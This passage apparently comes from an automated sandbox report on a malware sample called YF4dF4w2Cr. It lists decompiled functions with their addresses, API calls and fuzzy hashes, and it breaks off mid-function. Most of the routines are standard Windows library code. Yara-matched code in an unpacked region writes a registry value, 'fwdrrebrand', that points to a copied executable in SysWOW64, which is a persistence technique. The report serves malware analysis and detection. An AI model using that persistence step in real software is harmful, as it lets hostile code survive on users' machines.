                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040819E, Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0040819E(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __edi;
				void* __esi;
				struct HWND__* _t17;
				signed int _t22;
				struct HWND__* _t32;
				void* _t34;

				_t30 = __ecx;
				_push(__ecx);
				_v8 = __ecx;
				_t17 = GetWindow(GetDesktopWindow(), 5);
				_t32 = _t17;
				_t36 = _t32;
				if(_t32 == 0) {
					L14:
					return _t17;
				} else {
					_push(_t34);
					do {
						_t34 = E0040EE68(_t30, _t32, _t34, _t36, _t32);
						if(_t34 != 0) {
							_t20 =  *((intOrPtr*)(_v8 + 0x20));
							if( *((intOrPtr*)(_v8 + 0x20)) != _t32 && E00408105(_t20, _t32) != 0) {
								_t22 = GetWindowLongA(_t32, 0xfffffff0);
								if(_a4 != 0) {
									__eflags = _t22 & 0x18000000;
									if(__eflags == 0) {
										__eflags =  *(_t34 + 0x3c) & 0x00000002;
										if(__eflags != 0) {
											__eflags =  *(_v8 + 0xb4);
											if(__eflags == 0) {
												ShowWindow(_t32, 4);
												_t14 = _t34 + 0x3c;
												 *_t14 =  *(_t34 + 0x3c) & 0xfffffffd;
												__eflags =  *_t14;
											}
										}
									}
								} else {
									if((_t22 & 0x18000000) == 0x10000000) {
										ShowWindow(_t32, 0);
										 *(_t34 + 0x3c) =  *(_t34 + 0x3c) | 0x00000002;
									}
								}
							}
						}
						_t17 = GetWindow(_t32, 2);
						_t32 = _t17;
					} while (_t32 != 0);
					goto L14;
				}
			}










                  0x0040819e
                  0x004081a3
                  0x004081a7
                  0x004081b1
                  0x004081b7
                  0x004081b9
                  0x004081bb
                  0x00408243
                  0x00408245
                  0x004081c1
                  0x004081c8
                  0x004081c9
                  0x004081cf
                  0x004081d3
                  0x004081d8
                  0x004081dd
                  0x004081ed
                  0x004081f7
                  0x00408210
                  0x00408215
                  0x00408217
                  0x0040821b
                  0x00408220
                  0x00408227
                  0x0040822c
                  0x0040822e
                  0x0040822e
                  0x0040822e
                  0x0040822e
                  0x00408227
                  0x0040821b
                  0x004081f9
                  0x00408203
                  0x00408208
                  0x0040820a
                  0x0040820a
                  0x00408203
                  0x004081f7
                  0x004081dd
                  0x00408235
                  0x0040823b
                  0x0040823d
                  0x00000000
                  0x004081c9

                  APIs
                  • GetDesktopWindow.USER32 ref: 004081AA
                  • GetWindow.USER32(00000000), ref: 004081B1
                  • GetWindowLongA.USER32 ref: 004081ED
                  • ShowWindow.USER32(00000000,00000000), ref: 00408208
                  • ShowWindow.USER32(00000000,00000004), ref: 0040822C
                  • GetWindow.USER32(00000000,00000002), ref: 00408235
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Show$DesktopLong
                  • String ID:
                  • API String ID: 3178490500-0
                  • Opcode ID: 2adaebdcccac595bc1267bf586bd64cc53134c589bb79a51c25d8a8f8971210c
                  • Instruction ID: 421dcce19a151290b000e9d638100705882381d2d218f3d77e8fe81ceb2f36eb
                  • Opcode Fuzzy Hash: 2adaebdcccac595bc1267bf586bd64cc53134c589bb79a51c25d8a8f8971210c
                  • Instruction Fuzzy Hash: 0B110431440A04AFD721C7258E89F2F36B5EB917A5FA105BEF881B62C4CF3CDC018A19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004252FF, Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E004252FF(void* __ecx) {
				struct tagMSG _v32;
				void* __ebx;
				int _t20;
				intOrPtr _t23;
				int _t30;
				intOrPtr _t31;
				void* _t32;
				void* _t33;
				void* _t36;
				void* _t38;

				_t32 = PeekMessageA;
				_t38 = __ecx;
				while(PeekMessageA( &_v32, 0, 0xf, 0xf, 0) != 0) {
					_t20 = GetMessageA( &_v32, 0, 0xf, 0xf);
					if(_t20 != 0) {
						DispatchMessageA( &_v32);
						continue;
					}
					return _t20;
				}
				_t23 =  *((intOrPtr*)(_t38 + 0x68));
				 *((intOrPtr*)(_t38 + 0x70)) =  *((intOrPtr*)(_t23 + 0x88));
				 *(_t38 + 0x78) =  *(_t23 + 0x84) & 0x0000f000;
				SetRectEmpty(_t38 + 0xc);
				 *((intOrPtr*)(_t38 + 0x20)) = 0;
				 *((intOrPtr*)(_t38 + 0x1c)) = 0;
				 *((intOrPtr*)(_t38 + 0x24)) = 0;
				 *((intOrPtr*)(_t38 + 0x7c)) = 0;
				 *((intOrPtr*)(_t38 + 0x80)) = 0;
				_t33 = E0040EE3C(_t32,  *((intOrPtr*)(_t23 + 0x88)), GetDesktopWindow());
				_t30 = LockWindowUpdate( *(_t33 + 0x20));
				_t36 = _t33;
				if(_t30 == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(0);
				_t31 = E00425132(_t36);
				 *((intOrPtr*)(_t38 + 0x84)) = _t31;
				return _t31;
			}













                  0x00425308
                  0x00425310
                  0x00425337
                  0x0042531f
                  0x00425327
                  0x00425331
                  0x00000000
                  0x00425331
                  0x004253b3
                  0x004253b3
                  0x00425347
                  0x00425350
                  0x0042535e
                  0x00425365
                  0x0042536b
                  0x0042536e
                  0x00425371
                  0x00425374
                  0x00425377
                  0x00425389
                  0x0042538e
                  0x00425394
                  0x00425398
                  0x004253a1
                  0x0042539a
                  0x0042539a
                  0x0042539a
                  0x004253a3
                  0x004253a4
                  0x004253a9
                  0x00000000

                  APIs
                  • GetMessageA.USER32 ref: 0042531F
                  • DispatchMessageA.USER32 ref: 00425331
                  • PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00425341
                  • SetRectEmpty.USER32(?), ref: 00425365
                  • GetDesktopWindow.USER32 ref: 0042537D
                  • LockWindowUpdate.USER32(?,00000000), ref: 0042538E
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                  • String ID:
                  • API String ID: 1192691108-0
                  • Opcode ID: aace2d7f96b7781ae3f89cd1ea8af059833168b570cc0a46978888ca4ec1f2a3
                  • Instruction ID: 49a96046c5d33274eb4831c9af67dae449dda2e98a187f2c04bc5722c74187fb
                  • Opcode Fuzzy Hash: aace2d7f96b7781ae3f89cd1ea8af059833168b570cc0a46978888ca4ec1f2a3
                  • Instruction Fuzzy Hash: CB117F76A00B01ABD720DFA6DC48B67BBFCBB44740F40443AE696D76A1EB74D4019B18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040B025, Relevance: 9.1, APIs: 6, Instructions: 59windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 63%
                  			E0040B025(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t28;
				long _t31;
				void* _t33;
				void* _t38;
				void* _t58;
				void* _t59;

				_t52 = __edx;
				_push(0x18);
				E00431ACE(E0044AEBE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t59 - 0x1c)) = __ecx;
				_push(_t59 - 0x18);
				_push(_t59 - 0x20);
				_push( *((intOrPtr*)(_t59 + 0xc)));
				_push(0x3e8);
				L00447488();
				_t28 = GlobalLock( *(_t59 - 0x18));
				E004014C0(_t59 - 0x14, _t52);
				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
				 *(_t59 - 4) = 1;
				E00402830(_t52, __edi, _t28);
				_t31 = GlobalUnlock( *(_t59 - 0x18));
				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
				_push( *(_t59 - 0x18));
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push( *((intOrPtr*)(_t59 + 0xc)));
				L00447482();
				_t54 =  *((intOrPtr*)(_t59 - 0x1c));
				PostMessageA( *(_t59 + 8), 0x3e4,  *( *((intOrPtr*)(_t59 - 0x1c)) + 0x20), _t31);
				_t33 = E00412C5B( *((intOrPtr*)(_t59 - 0x1c)));
				_t61 = _t33;
				if(_t33 != 0) {
					_t58 = E0040A688(_t59 - 0x14);
					_t38 = E0041F363(__ebx, _t54, _t58, _t61);
					_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 4))));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t38 + 4)))) + 0xa0))(_t58);
					E0040A356(_t59 - 0x14, 0xffffffff);
				}
				E004010B0( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
				return E00431B73(0);
			}









                  0x0040b025
                  0x0040b025
                  0x0040b02c
                  0x0040b031
                  0x0040b037
                  0x0040b03b
                  0x0040b03c
                  0x0040b03f
                  0x0040b044
                  0x0040b04c
                  0x0040b057
                  0x0040b05c
                  0x0040b064
                  0x0040b068
                  0x0040b070
                  0x0040b076
                  0x0040b07a
                  0x0040b082
                  0x0040b087
                  0x0040b088
                  0x0040b08d
                  0x0040b090
                  0x0040b095
                  0x0040b0a0
                  0x0040b0a8
                  0x0040b0ad
                  0x0040b0af
                  0x0040b0b9
                  0x0040b0bb
                  0x0040b0c3
                  0x0040b0c8
                  0x0040b0d3
                  0x0040b0d3
                  0x0040b0de
                  0x0040b0ea

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040B02C
                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0040B044
                  • GlobalLock.KERNEL32 ref: 0040B04C
                  • GlobalUnlock.KERNEL32(?,00000000), ref: 0040B070
                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0040B090
                  • PostMessageA.USER32 ref: 0040B0A0
                    • Part of subcall function 00412C5B: IsWindowEnabled.USER32(?), ref: 00412C64
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow
                  • String ID:
                  • API String ID: 4187826474-0
                  • Opcode ID: 7712ed31451a7ab43eb35c33b2217e765a9a71d402a23eff9c4a25d2ad28ad7d
                  • Instruction ID: 9d41415674a00b450912fe41e8faaea42a91231a293c7cca4ef03f372c888be7
                  • Opcode Fuzzy Hash: 7712ed31451a7ab43eb35c33b2217e765a9a71d402a23eff9c4a25d2ad28ad7d
                  • Instruction Fuzzy Hash: 8911A235900109AFDF01EBA1CD46AFE7B74BF04315F14422AB515B72E1DB389A15CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426668, Relevance: 9.1, APIs: 6, Instructions: 58registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00426668(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
				}
				if(_a8 != 0) {
					_t28 = E0042652C(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E00426499(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}





                  0x00426673
                  0x00000000
                  0x004266f4
                  0x00426679
                  0x004266a2
                  0x004266a4
                  0x004266b8
                  0x00426686
                  0x00000000
                  0x00426686
                  0x004266d0
                  0x004266d6
                  0x004266d9
                  0x00000000
                  0x004266e3
                  0x004266a8
                  0x00000000
                  0x00000000
                  0x004266ae
                  0x00000000
                  0x004266ae
                  0x00426680
                  0x00426684
                  0x0042668e
                  0x00000000
                  0x0042668e
                  0x00000000

                  APIs
                  • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042668E
                  • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 004266AE
                  • RegCloseKey.ADVAPI32(00000000), ref: 004266D9
                    • Part of subcall function 00426499: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004264C9
                    • Part of subcall function 00426499: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004264EC
                    • Part of subcall function 00426499: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00426508
                    • Part of subcall function 00426499: RegCloseKey.ADVAPI32(?), ref: 00426518
                    • Part of subcall function 00426499: RegCloseKey.ADVAPI32(?), ref: 00426522
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004266F4
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                  • String ID:
                  • API String ID: 1886894508-0
                  • Opcode ID: cf54b3c77ee718f75f42add01bc63d46b6446b20ccf5db03060ca3b177b08ec9
                  • Instruction ID: 89b66a75d349d0838efd71de6006c1518052202ea5fbcc01f482d7d6114c7717
                  • Opcode Fuzzy Hash: cf54b3c77ee718f75f42add01bc63d46b6446b20ccf5db03060ca3b177b08ec9
                  • Instruction Fuzzy Hash: F011A036601235FBCF221F61EC08BAE3B65BF04355F564426FD1599120CBBAC811DB9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023EA58F, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023EA857
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: $C}q$F6.;$JN$ZGd
                  • API String ID: 1029625771-657663392
                  • Opcode ID: 725a2535bea74805b02b65e50c2839a8a37a945487a2bf795a7bec37c754f476
                  • Instruction ID: edfee69dcaea88f783ca42f08ffb998045923a6a4dcf9d16d30496c8d7e64946
                  • Opcode Fuzzy Hash: 725a2535bea74805b02b65e50c2839a8a37a945487a2bf795a7bec37c754f476
                  • Instruction Fuzzy Hash: 1061A8B4C55369CBEB208F81A9917CDBB70FB11304F6185C9D2A93B204DBB40A86CF95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004128A9, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E004128A9(void* __edx) {
				signed int _v8;
				void _v136;
				int _v140;
				int _v144;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				unsigned int _t23;
				char* _t35;
				struct HBITMAP__* _t37;
				unsigned int _t40;
				signed short _t42;
				intOrPtr _t46;
				int _t47;
				unsigned int _t49;
				void* _t52;
				signed char* _t53;
				void* _t54;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				signed int _t62;
				void* _t63;
				intOrPtr _t64;
				signed int _t66;
				signed int _t68;

				_t52 = __edx;
				_t66 = _t68;
				_t21 =  *0x463404; // 0x18eab29f
				_v8 = _t21 ^ _t66;
				_push(_t60);
				_push(_t54);
				_t23 = GetMenuCheckMarkDimensions();
				_t47 = _t23;
				_t40 = _t23 >> 0x10;
				_v144 = _t47;
				_v140 = _t40;
				if(_t47 <= 4) {
					L3:
					E00406436(_t40, _t47, _t54, _t60, _t73);
				} else {
					_t73 = _t40 - 5;
					if(_t40 <= 5) {
						goto L3;
					}
				}
				if(_t47 > 0x20) {
					_t47 = 0x20;
					_v144 = _t47;
				}
				asm("cdq");
				_t62 = _t47 + 0xf >> 4;
				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
				if(_t58 > 0xc) {
					_t58 = 0xc;
				}
				if(_t40 > 0x20) {
					_t40 = 0x20;
					_v140 = _t40;
				}
				E00431160(_t58,  &_v136, 0xff, 0x80);
				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
				_t53 = 0x4514b4;
				_t63 = _t62 + _t62;
				_v148 = 5;
				do {
					_t42 = ( *_t53 & 0x000000ff) << _t58;
					_t53 =  &(_t53[1]);
					_t49 =  !_t42 & 0x0000ffff;
					 *_t35 = _t49 >> 8;
					 *(_t35 + 1) = _t49;
					_t35 = _t35 + _t63;
					_t15 =  &_v148;
					 *_t15 = _v148 - 1;
				} while ( *_t15 != 0);
				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
				_pop(_t59);
				_pop(_t64);
				 *0x466560 = _t37;
				_pop(_t46);
				if(_t37 == 0) {
					 *0x466560 = _t37;
				}
				return E00430650(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
			}
































                  0x004128a9
                  0x004128ac
                  0x004128b4
                  0x004128bb
                  0x004128bf
                  0x004128c0
                  0x004128c1
                  0x004128c7
                  0x004128d0
                  0x004128d3
                  0x004128d9
                  0x004128df
                  0x004128e6
                  0x004128e6
                  0x004128e1
                  0x004128e1
                  0x004128e4
                  0x00000000
                  0x00000000
                  0x004128e4
                  0x004128ee
                  0x004128f2
                  0x004128f3
                  0x004128f3
                  0x004128fc
                  0x00412902
                  0x00412910
                  0x00412915
                  0x00412919
                  0x00412919
                  0x0041291d
                  0x00412921
                  0x00412922
                  0x00412922
                  0x00412939
                  0x00412949
                  0x00412950
                  0x00412955
                  0x00412957
                  0x00412961
                  0x00412967
                  0x0041296a
                  0x0041296e
                  0x00412976
                  0x00412978
                  0x0041297b
                  0x0041297d
                  0x0041297d
                  0x0041297d
                  0x0041299c
                  0x004129a2
                  0x004129a3
                  0x004129a4
                  0x004129a9
                  0x004129ac
                  0x004129ba
                  0x004129ba
                  0x004129ca

                  APIs
                  • GetMenuCheckMarkDimensions.USER32 ref: 004128C1
                  • _memset.LIBCMT ref: 00412939
                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0041299C
                  • LoadBitmapA.USER32 ref: 004129B4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                  • String ID:
                  • API String ID: 4271682439-3916222277
                  • Opcode ID: b5f77ca9ce8d0de09fb24572092bc98af35eea4ddacb5d1be8eaecbc8a1ea975
                  • Instruction ID: 38b95418af95e8854720099d7e8ddae421d8a6e1ae950d27b7bdda4e2e8a65fc
                  • Opcode Fuzzy Hash: b5f77ca9ce8d0de09fb24572092bc98af35eea4ddacb5d1be8eaecbc8a1ea975
                  • Instruction Fuzzy Hash: F6312971A002159FEB20CF299D85BE97BB4FB44304F4541BBF549E7292DB748D84CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040C509, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                  Download Yara Rule
                  C-Code - Quality: 58%
                  			E0040C509(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E0040C354() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E00433504(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x466328(_a4, _a8);
			}








                  0x0040c518
                  0x0040c531
                  0x0040c59c
                  0x0040c59c
                  0x0040c59e
                  0x00000000
                  0x0040c59f
                  0x0040c533
                  0x0040c53a
                  0x00000000
                  0x0040c553
                  0x0040c554
                  0x0040c557
                  0x0040c565
                  0x0040c568
                  0x0040c570
                  0x0040c571
                  0x0040c572
                  0x0040c573
                  0x0040c57a
                  0x0040c57d
                  0x0040c581
                  0x0040c590
                  0x0040c595
                  0x0040c598
                  0x00000000
                  0x0040c598
                  0x0040c53a
                  0x00000000

                  APIs
                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0040C549
                  • GetSystemMetrics.USER32 ref: 0040C561
                  • GetSystemMetrics.USER32 ref: 0040C568
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: System$Metrics$InfoParameters
                  • String ID: B$DISPLAY
                  • API String ID: 3136151823-3316187204
                  • Opcode ID: 21211c0dfc0b0310e6e94eb9e5fcc5913642c798adf72206dc1ed171178922e0
                  • Instruction ID: 791c3770960fa488d4c8b65a8903be86f79acb93c7c19c9457816c0bfd0009e2
                  • Opcode Fuzzy Hash: 21211c0dfc0b0310e6e94eb9e5fcc5913642c798adf72206dc1ed171178922e0
                  • Instruction Fuzzy Hash: DC11C475500334FBDB119F658CC1A5BBBA8EF0A751F0441B2FD05BA186D2B4E940CBD9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ED704, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 023ED779
                  • RegSetValueExW.ADVAPI32(?,023F2700,00000000,00000001,?,00000000), ref: 023ED79D
                  • RegCloseKey.ADVAPI32(?), ref: 023ED7A6
                  Strings
                  • fwdrrebrand, xrefs: 023ED795
                  • C:\Windows\SysWOW64\fwdrrebrand.exe, xrefs: 023ED736
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateValue
                  • String ID: C:\Windows\SysWOW64\fwdrrebrand.exe$fwdrrebrand
                  • API String ID: 1818849710-3855578920
                  • Opcode ID: 620721afb614bae5bed359364e2b11c5d85b1e85f282ba023500b6617eea7555
                  • Instruction ID: e81321cfd811bf7bf55a8a1a96964e7e81e9787219833f69bdc4d8cbc2120270
                  • Opcode Fuzzy Hash: 620721afb614bae5bed359364e2b11c5d85b1e85f282ba023500b6617eea7555
                  • Instruction Fuzzy Hash: DF11C0B5A40218FBEF605B98AC85F7B736EDB44750F500565FA0FD2181EB714D1886A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042277C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0042277C(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                  0x00422788
                  0x0042278a
                  0x00422796
                  0x00422798
                  0x004227a0
                  0x004227b1
                  0x004227b5
                  0x004227b8
                  0x004227b8
                  0x004227a2
                  0x004227aa
                  0x004227aa
                  0x004227c3

                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 0042278A
                  • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 00422798
                  • SetLastError.KERNEL32(00000078), ref: 004227B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$SetLayout
                  • API String ID: 4275029093-2147214759
                  • Opcode ID: e540bd1042b3f68eb9b6f0ed1f5cd4fb6be716e9388cfb093c8fcd2548240629
                  • Instruction ID: 395a0e9ebdf5a2e1b80e510cae3e67cf4d98a6f7501344e6daefd505b8f3eb0f
                  • Opcode Fuzzy Hash: e540bd1042b3f68eb9b6f0ed1f5cd4fb6be716e9388cfb093c8fcd2548240629
                  • Instruction Fuzzy Hash: 07E02B373002147B82111F66AD0890A7E56E7C5B723658133F925D3290CA7588418768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00435257, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E00435257(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;

				_t26 = __esi;
				_t25 = __edi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00436178(_t23, __edx, __edi, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E00436178(_t23, __edx, __edi, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E00436178(_t23, __edx, __edi, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x45e1d0);
						E00431818(_t23, __edi, __esi);
